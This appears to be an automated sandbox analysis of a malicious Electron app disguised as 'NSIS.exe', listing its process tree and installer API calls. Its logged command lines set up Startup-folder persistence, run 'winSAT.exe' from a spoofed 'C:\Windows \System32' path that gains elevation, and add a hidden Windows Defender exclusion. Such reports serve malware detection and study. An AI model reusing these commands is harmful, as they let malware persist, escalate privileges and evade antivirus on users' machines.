                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
                                                                                                                                                                                            Imagebase:0x7ff7f04f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                            Start time:11:34:19
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff7a98e0000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                            Start time:11:34:21
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows \System32\winSAT.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows \System32\winSAT.exe"
                                                                                                                                                                                            Imagebase:0x7ff7a98e0000
                                                                                                                                                                                            File size:2'810'880 bytes
                                                                                                                                                                                            MD5 hash:FC2414F108B613366BDE7AE897AB53A1
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                            Start time:11:34:22
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                            Start time:11:34:22
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                            Start time:11:36:20
                                                                                                                                                                                            Start date:06/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:25.8%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:20.2%
                                                                                                                                                                                              Total number of Nodes:1333
                                                                                                                                                                                              Total number of Limit Nodes:33
                                                                                                                                                                                              execution_graph 2912 401941 2913 401943 2912->2913 2918 402c41 2913->2918 2919 402c4d 2918->2919 2960 4062dc 2919->2960 2922 401948 2924 4059cc 2922->2924 3002 405c97 2924->3002 2927 4059f4 DeleteFileW 2957 401951 2927->2957 2928 405a0b 2929 405b2b 2928->2929 3016 4062ba lstrcpynW 2928->3016 2929->2957 3045 4065fd FindFirstFileW 2929->3045 2931 405a31 2932 405a44 2931->2932 2933 405a37 lstrcatW 2931->2933 3018 405bdb lstrlenW 2932->3018 2934 405a4a 2933->2934 2937 405a5a lstrcatW 2934->2937 2939 405a65 lstrlenW FindFirstFileW 2934->2939 2937->2939 2939->2929 2949 405a87 2939->2949 2942 405984 5 API calls 2945 405b66 2942->2945 2944 405b0e FindNextFileW 2946 405b24 FindClose 2944->2946 2944->2949 2947 405b80 2945->2947 2948 405b6a 2945->2948 2946->2929 2951 405322 24 API calls 2947->2951 2952 405322 24 API calls 2948->2952 2948->2957 2949->2944 2953 4059cc 60 API calls 2949->2953 2955 405322 24 API calls 2949->2955 3017 4062ba lstrcpynW 2949->3017 3022 405984 2949->3022 3030 405322 2949->3030 3041 406080 MoveFileExW 2949->3041 2951->2957 2954 405b77 2952->2954 2953->2949 2956 406080 36 API calls 2954->2956 2955->2944 2956->2957 2973 4062e9 2960->2973 2961 406534 2962 402c6e 2961->2962 2993 4062ba lstrcpynW 2961->2993 2962->2922 2977 40654e 2962->2977 2964 406502 lstrlenW 2964->2973 2965 4062dc 10 API calls 2965->2964 2968 406417 GetSystemDirectoryW 2968->2973 2970 40642a GetWindowsDirectoryW 2970->2973 2971 40654e 5 API calls 2971->2973 2972 4064a5 lstrcatW 2972->2973 2973->2961 2973->2964 2973->2965 2973->2968 2973->2970 2973->2971 2973->2972 2974 40645e SHGetSpecialFolderLocation 2973->2974 2975 4062dc 10 API calls 2973->2975 2986 406188 2973->2986 2991 406201 wsprintfW 2973->2991 2992 4062ba lstrcpynW 2973->2992 2974->2973 2976 406476 SHGetPathFromIDListW CoTaskMemFree 2974->2976 2975->2973 2976->2973 2980 40655b 2977->2980 2978 4065d1 2979 4065d6 CharPrevW 2978->2979 2983 4065f7 2978->2983 2979->2978 2980->2978 2981 4065c4 CharNextW 2980->2981 2984 4065b0 CharNextW 2980->2984 2985 4065bf CharNextW 2980->2985 2998 405bbc 2980->2998 2981->2978 2981->2980 2983->2922 2984->2980 2985->2981 2994 406127 2986->2994 2989 4061ec 2989->2973 2990 4061bc RegQueryValueExW RegCloseKey 2990->2989 2991->2973 2992->2973 2993->2962 2995 406136 2994->2995 2996 40613a 2995->2996 2997 40613f RegOpenKeyExW 2995->2997 2996->2989 2996->2990 2997->2996 2999 405bc2 2998->2999 3000 405bd8 2999->3000 3001 405bc9 CharNextW 2999->3001 3000->2980 3001->2999 3051 4062ba lstrcpynW 3002->3051 3004 405ca8 3052 405c3a CharNextW CharNextW 3004->3052 3007 4059ec 3007->2927 3007->2928 3008 40654e 5 API calls 3011 405cbe 3008->3011 3009 405cef lstrlenW 3010 405cfa 3009->3010 3009->3011 3012 405b8f 3 API calls 3010->3012 3011->3007 3011->3009 3013 4065fd 2 API calls 3011->3013 3015 405bdb 2 API calls 3011->3015 3014 405cff GetFileAttributesW 3012->3014 3013->3011 3014->3007 3015->3009 3016->2931 3017->2949 3019 405be9 3018->3019 3020 405bfb 3019->3020 3021 405bef CharPrevW 3019->3021 3020->2934 3021->3019 3021->3020 3058 405d8b GetFileAttributesW 3022->3058 3025 4059b1 3025->2949 3026 4059a7 DeleteFileW 3028 4059ad 3026->3028 3027 40599f RemoveDirectoryW 3027->3028 3028->3025 3029 4059bd SetFileAttributesW 3028->3029 3029->3025 3031 40533d 3030->3031 3040 4053df 3030->3040 3032 405359 lstrlenW 3031->3032 3033 4062dc 17 API calls 3031->3033 3034 405382 3032->3034 3035 405367 lstrlenW 3032->3035 3033->3032 3037 405395 3034->3037 3038 405388 SetWindowTextW 3034->3038 3036 405379 lstrcatW 3035->3036 3035->3040 3036->3034 3039 40539b SendMessageW SendMessageW SendMessageW 3037->3039 3037->3040 3038->3037 3039->3040 3040->2949 3042 4060a1 3041->3042 3043 406094 3041->3043 3042->2949 3061 405f06 3043->3061 3046 406613 FindClose 3045->3046 3047 405b50 3045->3047 3046->3047 3047->2957 3048 405b8f lstrlenW CharPrevW 3047->3048 3049 405b5a 3048->3049 3050 405bab lstrcatW 3048->3050 3049->2942 3050->3049 3051->3004 3053 405c57 3052->3053 3056 405c69 3052->3056 3055 405c64 CharNextW 3053->3055 3053->3056 3054 405c8d 3054->3007 3054->3008 3055->3054 3056->3054 3057 405bbc CharNextW 3056->3057 3057->3056 3059 405990 3058->3059 3060 405d9d SetFileAttributesW 3058->3060 3059->3025 3059->3026 3059->3027 3060->3059 3062 405f36 3061->3062 3063 405f5c GetShortPathNameW 3061->3063 3088 405db0 GetFileAttributesW CreateFileW 3062->3088 3065 405f71 3063->3065 3066 40607b 3063->3066 3065->3066 3067 405f79 wsprintfA 3065->3067 3066->3042 3069 4062dc 17 API calls 3067->3069 3068 405f40 CloseHandle GetShortPathNameW 3068->3066 3070 405f54 3068->3070 3071 405fa1 3069->3071 3070->3063 3070->3066 3089 405db0 GetFileAttributesW CreateFileW 3071->3089 3073 405fae 3073->3066 3074 405fbd GetFileSize GlobalAlloc 3073->3074 3075 406074 CloseHandle 3074->3075 3076 405fdf 3074->3076 3075->3066 3090 405e33 ReadFile 3076->3090 3081 406012 3083 405d15 4 API calls 3081->3083 3082 405ffe lstrcpyA 3084 406020 3082->3084 3083->3084 3085 406057 SetFilePointer 3084->3085 3097 405e62 WriteFile 3085->3097 3088->3068 3089->3073 3091 405e51 3090->3091 3091->3075 3092 405d15 lstrlenA 3091->3092 3093 405d56 lstrlenA 3092->3093 3094 405d2f lstrcmpiA 3093->3094 3095 405d5e 3093->3095 3094->3095 3096 405d4d CharNextA 3094->3096 3095->3081 3095->3082 3096->3093 3098 405e80 GlobalFree 3097->3098 3098->3075 3099 4015c1 3100 402c41 17 API calls 3099->3100 3101 4015c8 3100->3101 3102 405c3a 4 API calls 3101->3102 3114 4015d1 3102->3114 3103 401631 3105 401663 3103->3105 3106 401636 3103->3106 3104 405bbc CharNextW 3104->3114 3108 401423 24 API calls 3105->3108 3126 401423 3106->3126 3116 40165b 3108->3116 3113 40164a SetCurrentDirectoryW 3113->3116 3114->3103 3114->3104 3115 401617 GetFileAttributesW 3114->3115 3118 40588b 3114->3118 3121 4057f1 CreateDirectoryW 3114->3121 3130 40586e CreateDirectoryW 3114->3130 3115->3114 3133 406694 GetModuleHandleA 3118->3133 3122 405842 GetLastError 3121->3122 3123 40583e 3121->3123 3122->3123 3124 405851 SetFileSecurityW 3122->3124 3123->3114 3124->3123 3125 405867 GetLastError 3124->3125 3125->3123 3127 405322 24 API calls 3126->3127 3128 401431 3127->3128 3129 4062ba lstrcpynW 3128->3129 3129->3113 3131 405882 GetLastError 3130->3131 3132 40587e 3130->3132 3131->3132 3132->3114 3134 4066b0 3133->3134 3135 4066ba GetProcAddress 3133->3135 3139 406624 GetSystemDirectoryW 3134->3139 3137 405892 3135->3137 3137->3114 3138 4066b6 3138->3135 3138->3137 3140 406646 wsprintfW LoadLibraryExW 3139->3140 3140->3138 3294 401e49 3295 402c1f 17 API calls 3294->3295 3296 401e4f 3295->3296 3297 402c1f 17 API calls 3296->3297 3298 401e5b 3297->3298 3299 401e72 EnableWindow 3298->3299 3300 401e67 ShowWindow 3298->3300 3301 402ac5 3299->3301 3300->3301 3756 40264a 3757 402c1f 17 API calls 3756->3757 3761 402659 3757->3761 3758 4026a3 ReadFile 3758->3761 3768 402796 3758->3768 3759 405e33 ReadFile 3759->3761 3761->3758 3761->3759 3762 4026e3 MultiByteToWideChar 3761->3762 3763 402798 3761->3763 3765 402709 SetFilePointer MultiByteToWideChar 3761->3765 3766 4027a9 3761->3766 3761->3768 3769 405e91 SetFilePointer 3761->3769 3762->3761 3778 406201 wsprintfW 3763->3778 3765->3761 3767 4027ca SetFilePointer 3766->3767 3766->3768 3767->3768 3770 405ead 3769->3770 3771 405ec5 3769->3771 3772 405e33 ReadFile 3770->3772 3771->3761 3773 405eb9 3772->3773 3773->3771 3774 405ef6 SetFilePointer 3773->3774 3775 405ece SetFilePointer 3773->3775 3774->3771 3775->3774 3776 405ed9 3775->3776 3777 405e62 WriteFile 3776->3777 3777->3771 3778->3768 3782 4016cc 3783 402c41 17 API calls 3782->3783 3784 4016d2 GetFullPathNameW 3783->3784 3785 4016ec 3784->3785 3791 40170e 3784->3791 3788 4065fd 2 API calls 3785->3788 3785->3791 3786 401723 GetShortPathNameW 3787 402ac5 3786->3787 3789 4016fe 3788->3789 3789->3791 3792 4062ba lstrcpynW 3789->3792 3791->3786 3791->3787 3792->3791 3793 40234e 3794 402c41 17 API calls 3793->3794 3795 40235d 3794->3795 3796 402c41 17 API calls 3795->3796 3797 402366 3796->3797 3798 402c41 17 API calls 3797->3798 3799 402370 GetPrivateProfileStringW 3798->3799 3582 4038d0 3583 4038e8 3582->3583 3584 4038da CloseHandle 3582->3584 3589 403915 3583->3589 3584->3583 3587 4059cc 67 API calls 3588 4038f9 3587->3588 3590 403923 3589->3590 3591 4038ed 3590->3591 3592 403928 FreeLibrary GlobalFree 3590->3592 3591->3587 3592->3591 3592->3592 3800 401b53 3801 402c41 17 API calls 3800->3801 3802 401b5a 3801->3802 3803 402c1f 17 API calls 3802->3803 3804 401b63 wsprintfW 3803->3804 3805 402ac5 3804->3805 3806 401956 3807 402c41 17 API calls 3806->3807 3808 40195d lstrlenW 3807->3808 3809 402592 3808->3809 3810 4014d7 3811 402c1f 17 API calls 3810->3811 3812 4014dd Sleep 3811->3812 3814 402ac5 3812->3814 3639 403d58 3640 403d70 3639->3640 3641 403eab 3639->3641 3640->3641 3642 403d7c 3640->3642 3643 403efc 3641->3643 3644 403ebc GetDlgItem GetDlgItem 3641->3644 3646 403d87 SetWindowPos 3642->3646 3647 403d9a 3642->3647 3645 403f56 3643->3645 3653 401389 2 API calls 3643->3653 3648 404231 18 API calls 3644->3648 3649 40427d SendMessageW 3645->3649 3670 403ea6 3645->3670 3646->3647 3650 403db7 3647->3650 3651 403d9f ShowWindow 3647->3651 3652 403ee6 SetClassLongW 3648->3652 3682 403f68 3649->3682 3654 403dd9 3650->3654 3655 403dbf DestroyWindow 3650->3655 3651->3650 3656 40140b 2 API calls 3652->3656 3657 403f2e 3653->3657 3658 403dde SetWindowLongW 3654->3658 3659 403def 3654->3659 3709 4041ba 3655->3709 3656->3643 3657->3645 3662 403f32 SendMessageW 3657->3662 3658->3670 3660 403e98 3659->3660 3661 403dfb GetDlgItem 3659->3661 3667 404298 8 API calls 3660->3667 3665 403e2b 3661->3665 3666 403e0e SendMessageW IsWindowEnabled 3661->3666 3662->3670 3663 40140b 2 API calls 3663->3682 3664 4041bc DestroyWindow EndDialog 3664->3709 3669 403e30 3665->3669 3672 403e38 3665->3672 3674 403e7f SendMessageW 3665->3674 3675 403e4b 3665->3675 3666->3665 3666->3670 3667->3670 3668 4041eb ShowWindow 3668->3670 3676 40420a SendMessageW 3669->3676 3671 4062dc 17 API calls 3671->3682 3672->3669 3672->3674 3673 404231 18 API calls 3673->3682 3674->3660 3678 403e53 3675->3678 3679 403e68 3675->3679 3677 403e66 3676->3677 3677->3660 3681 40140b 2 API calls 3678->3681 3680 40140b 2 API calls 3679->3680 3683 403e6f 3680->3683 3681->3669 3682->3663 3682->3664 3682->3670 3682->3671 3682->3673 3684 404231 18 API calls 3682->3684 3700 4040fc DestroyWindow 3682->3700 3683->3660 3683->3669 3685 403fe3 GetDlgItem 3684->3685 3686 404000 ShowWindow KiUserCallbackDispatcher 3685->3686 3687 403ff8 3685->3687 3710 404253 KiUserCallbackDispatcher 3686->3710 3687->3686 3689 40402a EnableWindow 3694 40403e 3689->3694 3690 404043 GetSystemMenu EnableMenuItem SendMessageW 3691 404073 SendMessageW 3690->3691 3690->3694 3691->3694 3693 403d39 18 API calls 3693->3694 3694->3690 3694->3693 3711 404266 SendMessageW 3694->3711 3712 4062ba lstrcpynW 3694->3712 3696 4040a2 lstrlenW 3697 4062dc 17 API calls 3696->3697 3698 4040b8 SetWindowTextW 3697->3698 3699 401389 2 API calls 3698->3699 3699->3682 3701 404116 CreateDialogParamW 3700->3701 3700->3709 3702 404149 3701->3702 3701->3709 3703 404231 18 API calls 3702->3703 3704 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3703->3704 3705 401389 2 API calls 3704->3705 3706 40419a 3705->3706 3706->3670 3707 4041a2 ShowWindow 3706->3707 3708 40427d SendMessageW 3707->3708 3708->3709 3709->3668 3709->3670 3710->3689 3711->3694 3712->3696 3815 401f58 3816 402c41 17 API calls 3815->3816 3817 401f5f 3816->3817 3818 4065fd 2 API calls 3817->3818 3819 401f65 3818->3819 3821 401f76 3819->3821 3822 406201 wsprintfW 3819->3822 3822->3821 3713 402259 3714 402c41 17 API calls 3713->3714 3715 40225f 3714->3715 3716 402c41 17 API calls 3715->3716 3717 402268 3716->3717 3718 402c41 17 API calls 3717->3718 3719 402271 3718->3719 3720 4065fd 2 API calls 3719->3720 3721 40227a 3720->3721 3722 40228b lstrlenW lstrlenW 3721->3722 3723 40227e 3721->3723 3725 405322 24 API calls 3722->3725 3724 405322 24 API calls 3723->3724 3727 402286 3723->3727 3724->3727 3726 4022c9 SHFileOperationW 3725->3726 3726->3723 3726->3727 3823 4046db 3824 404711 3823->3824 3825 4046eb 3823->3825 3827 404298 8 API calls 3824->3827 3826 404231 18 API calls 3825->3826 3828 4046f8 SetDlgItemTextW 3826->3828 3829 40471d 3827->3829 3828->3824 3728 40175c 3729 402c41 17 API calls 3728->3729 3730 401763 3729->3730 3731 405ddf 2 API calls 3730->3731 3732 40176a 3731->3732 3733 405ddf 2 API calls 3732->3733 3733->3732 3830 401d5d GetDlgItem GetClientRect 3831 402c41 17 API calls 3830->3831 3832 401d8f LoadImageW SendMessageW 3831->3832 3833 402ac5 3832->3833 3834 401dad DeleteObject 3832->3834 3834->3833 3835 4022dd 3836 4022e4 3835->3836 3837 4022f7 3835->3837 3838 4062dc 17 API calls 3836->3838 3839 4022f1 3838->3839 3840 405920 MessageBoxIndirectW 3839->3840 3840->3837 3142 405461 3143 405482 GetDlgItem GetDlgItem GetDlgItem 3142->3143 3144 40560b 3142->3144 3188 404266 SendMessageW 3143->3188 3146 405614 GetDlgItem CreateThread CloseHandle 3144->3146 3147 40563c 3144->3147 3146->3147 3211 4053f5 OleInitialize 3146->3211 3149 405667 3147->3149 3150 405653 ShowWindow ShowWindow 3147->3150 3151 40568c 3147->3151 3148 4054f2 3155 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3148->3155 3152 405673 3149->3152 3153 4056c7 3149->3153 3193 404266 SendMessageW 3150->3193 3197 404298 3151->3197 3157 4056a1 ShowWindow 3152->3157 3158 40567b 3152->3158 3153->3151 3163 4056d5 SendMessageW 3153->3163 3161 405567 3155->3161 3162 40554b SendMessageW SendMessageW 3155->3162 3159 4056c1 3157->3159 3160 4056b3 3157->3160 3194 40420a 3158->3194 3166 40420a SendMessageW 3159->3166 3165 405322 24 API calls 3160->3165 3167 40557a 3161->3167 3168 40556c SendMessageW 3161->3168 3162->3161 3169 40569a 3163->3169 3170 4056ee CreatePopupMenu 3163->3170 3165->3159 3166->3153 3189 404231 3167->3189 3168->3167 3171 4062dc 17 API calls 3170->3171 3173 4056fe AppendMenuW 3171->3173 3175 40571b GetWindowRect 3173->3175 3176 40572e TrackPopupMenu 3173->3176 3174 40558a 3177 405593 ShowWindow 3174->3177 3178 4055c7 GetDlgItem SendMessageW 3174->3178 3175->3176 3176->3169 3180 405749 3176->3180 3181 4055b6 3177->3181 3182 4055a9 ShowWindow 3177->3182 3178->3169 3179 4055ee SendMessageW SendMessageW 3178->3179 3179->3169 3183 405765 SendMessageW 3180->3183 3192 404266 SendMessageW 3181->3192 3182->3181 3183->3183 3184 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3183->3184 3186 4057a7 SendMessageW 3184->3186 3186->3186 3187 4057d0 GlobalUnlock SetClipboardData CloseClipboard 3186->3187 3187->3169 3188->3148 3190 4062dc 17 API calls 3189->3190 3191 40423c SetDlgItemTextW 3190->3191 3191->3174 3192->3178 3193->3149 3195 404211 3194->3195 3196 404217 SendMessageW 3194->3196 3195->3196 3196->3151 3198 40435b 3197->3198 3199 4042b0 GetWindowLongW 3197->3199 3198->3169 3199->3198 3200 4042c5 3199->3200 3200->3198 3201 4042f2 GetSysColor 3200->3201 3202 4042f5 3200->3202 3201->3202 3203 404305 SetBkMode 3202->3203 3204 4042fb SetTextColor 3202->3204 3205 404323 3203->3205 3206 40431d GetSysColor 3203->3206 3204->3203 3207 404334 3205->3207 3208 40432a SetBkColor 3205->3208 3206->3205 3207->3198 3209 404347 DeleteObject 3207->3209 3210 40434e CreateBrushIndirect 3207->3210 3208->3207 3209->3210 3210->3198 3218 40427d 3211->3218 3213 405418 3217 40543f 3213->3217 3221 401389 3213->3221 3214 40427d SendMessageW 3215 405451 CoUninitialize 3214->3215 3217->3214 3219 404295 3218->3219 3220 404286 SendMessageW 3218->3220 3219->3213 3220->3219 3223 401390 3221->3223 3222 4013fe 3222->3213 3223->3222 3224 4013cb MulDiv SendMessageW 3223->3224 3224->3223 3841 401563 3842 402a6b 3841->3842 3845 406201 wsprintfW 3842->3845 3844 402a70 3845->3844 3225 4023e4 3226 402c41 17 API calls 3225->3226 3227 4023f6 3226->3227 3228 402c41 17 API calls 3227->3228 3229 402400 3228->3229 3242 402cd1 3229->3242 3232 402ac5 3233 402438 3234 402444 3233->3234 3246 402c1f 3233->3246 3237 402463 RegSetValueExW 3234->3237 3249 403116 3234->3249 3235 402c41 17 API calls 3238 40242e lstrlenW 3235->3238 3240 402479 RegCloseKey 3237->3240 3238->3233 3240->3232 3243 402cec 3242->3243 3269 406155 3243->3269 3247 4062dc 17 API calls 3246->3247 3248 402c34 3247->3248 3248->3234 3250 40312f 3249->3250 3251 40315d 3250->3251 3276 403347 SetFilePointer 3250->3276 3273 403331 3251->3273 3255 4032ca 3257 40330c 3255->3257 3262 4032ce 3255->3262 3256 40317a GetTickCount 3258 4032b4 3256->3258 3265 4031c9 3256->3265 3260 403331 ReadFile 3257->3260 3258->3237 3259 403331 ReadFile 3259->3265 3260->3258 3261 403331 